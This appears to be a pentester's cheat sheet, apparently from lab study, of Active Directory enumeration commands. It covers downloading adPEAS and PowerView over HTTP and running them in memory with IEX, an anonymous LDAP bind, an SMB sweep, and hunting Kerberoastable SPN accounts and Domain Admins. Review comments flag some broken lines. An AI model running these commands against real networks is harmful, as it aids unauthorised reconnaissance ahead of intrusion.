Enumeration
# Fetch adPEAS over plain HTTP and execute it in memory with IEX, then run the
# enumeration for 'domain.com' through dc01. Detection note: the downloaded
# script text is still captured by PowerShell script block logging (Event ID 4104).
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/adPEAS.ps1');Invoke-adPEAS -Domain 'domain.com' -Server 'dc01.domain.com'
or
# Same tool, written to disk first: download adPEAS.ps1 to C:\tmp, import it as a
# module, then run it. Import-Module uses a relative path (.\), so the session's
# working directory must be C:\tmp for this to resolve.
Invoke-WebRequest -Uri "http://192.168.45.5/adPEAS.ps1" -OutFile "C:\tmp\adPEAS.ps1"
Import-Module .\adPEAS.ps1
Invoke-adPEAS -Domain 'domain.com' -Server 'dc01.domain.com'
# Run adPEAS with explicit credentials instead of the current logon context.
# Both forms below put the password in clear text on the command line; that literal
# is recorded by PowerShell transcription and script block logging, a detection point.
$SecPassword = ConvertTo-SecureString 'Pass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain\johndoe', $SecPassword)
Invoke-adPEAS -Domain 'domain.com' -Cred $Cred
# One-liner form using -Username/-Password instead of a PSCredential.
# NOTE(review): the server here is 'dc1' while the lines above use 'dc01' — confirm which is intended.
Invoke-adPEAS -Domain 'domain.com' -Server 'dc1.domain.com' -Username 'domain\johndoe' -Password 'pass' -Force
# Anonymous simple-auth LDAP query (empty bind DN and password = null bind) against the
# hutch.offsec naming context, with the output saved to ./ldapuser. It returns data only
# where the directory permits anonymous reads.
ldapsearch -x -H LDAP://192.168.222.122 -D '' -w '' -b "DC=hutch,DC=offsec" > ldapuser
# SMB sweep of the whole /24; no credentials are supplied on this line.
crackmapexec smb 192.168.0.0/24
# PowerView: load it (in memory over HTTP, or download-then-import), then query the domain.
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/PowerView.ps1')
Invoke-WebRequest -Uri "http://192.168.45.5/PowerView.ps1" -OutFile "C:\tmp\PowerView.ps1"
Import-Module .\PowerView.ps1
Get-NetDomain #Domain info
Get-DomainController #DC info
Get-NetUser -SPN #Kerberoastable users
# Same idea against a named domain: users whose servicePrincipalName attribute is set
Get-NetUser -Domain msp.local | Where-Object {$_.servicePrincipalName}
Get-NetComputer #Computer objects in the domain
Get-NetUser #User objects in the domain
# Recursive expansion of Domain Admins, so members of nested groups are included
Get-DomainGroupMember "Domain Admins" -Recurse
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host
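# Built-in net.exe / whoami enumeration (runs from cmd or PowerShell). Comments are kept
# on their own lines so the commands stay valid in both shells.
# local accounts
net user
# domain accounts
net user /domain
# details of one domain account (xxx is a placeholder username)
net user xxx /domain
# domain groups (pdf p.632 for enum groups)
net group /domain
net group "domain admins" /domain
net localgroup "administrators"
# NOTE(review): the documented whoami switch is /groups — confirm that /group is accepted.
whoami /group
net user /domain
net localgroup /domain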
# Current domain object via .NET; PdcRoleOwner names the primary DC (sample output follows).
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PdcRoleOwner : DC01.corp.com (primary dc)
Name : corp.com
# Interactive nslookup: ask for all record types, then resolve the DC-locator SRV name
# (_ldap._tcp.dc._msdcs.<domain>) to list the domain controllers of sandbox.local.
nslookup
set type=all
_ldap._tcp.dc._msdcs.sandbox.local
# Default NSE script scan; no target is given on this line.
nmap -sC
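# as admin
net user /domain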
# Compose the ADSI search root "LDAP://<PDC>/DC=<label>,DC=<label>" for the current
# domain and print it (sample output follows). Requires a domain-joined session,
# since GetCurrentDomain() queries the domain the host belongs to.
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
# Turn the dotted domain name into its distinguished-name form.
$DistinguishedName = "DC=" + $domainObj.Name.Replace('.', ',DC=')
$SearchString = "LDAP://{0}/{1}" -f $PDC, $DistinguishedName
$SearchString
LDAP://DC01.corp.com/DC=corp,DC=com
# Enumerate every user object (samAccountType 805306368 = normal user accounts) with an
# LDAP search rooted at the domain's PDC, printing each returned property. Needs a
# domain-joined context because GetCurrentDomain() is used to find the PDC.
# NOTE(review): the commented-out line below is not valid PowerShell as written — a bare
# host name is parsed as a command name, not a string — so it documents intent only.
#$domainObj = dc01.corp.com # if as a local user instead of domain user
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
# "LDAP://<pdc>/DC=<label>,DC=<label>" built from the dotted domain name.
$DistinguishedName = "DC=" + $domainObj.Name.Replace('.', ',DC=')
$SearchString = "LDAP://{0}/{1}" -f $PDC, $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter = "samAccountType=805306368"
$Result = $Searcher.FindAll()
foreach ($obj in $Result) {
    # The foreach statement enumerates the property collection entry by entry.
    foreach ($prop in $obj.Properties) { $prop }
    Write-Host "------------------------"
}
# Alternative filter for the same searcher: a single account looked up by name.
$Searcher.filter = "name=Jeff_Admin"
Find name
Search by service account name and servicePrincipalName (the SPN is what a service ticket is requested for).
The snippet below can be saved as a .ps1 script.
# Variant of the search above filtered on servicePrincipalName=*corp* (accounts whose SPN
# contains "corp"); the loop prints every returned property of each match.
# as a local user
# NOTE(review): a bare dc01.corp.com is parsed as a command name, not a string, so this
# assignment does not produce an object with PdcRoleOwner/Name; as written the block only
# works with the GetCurrentDomain() form described in the next comment.
$domainObj = dc01.corp.com
# or as domain user > [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
# Build "LDAP://<pdc>/DC=<label>,DC=<label>" from the dotted domain name.
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
# LDAP wildcard filter: any servicePrincipalName value containing "corp".
$Searcher.filter="serviceprincipalname=*corp*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
Write-Host "------------------------"
}
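# List registered SPNs: -Q queries, -F searches forest-wide, -T names the target domain.
setspn -T * -F -Q */*
setspn -T domain.local -F -Q */*
# if no domain name is available, target the local computer
setspn -T $env:computername -F -Q */*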
# Resolve a single host name.
# NOTE(review): "corp.comer" looks like a typo for corp.com — confirm.
nslookup corpweb.corp.comer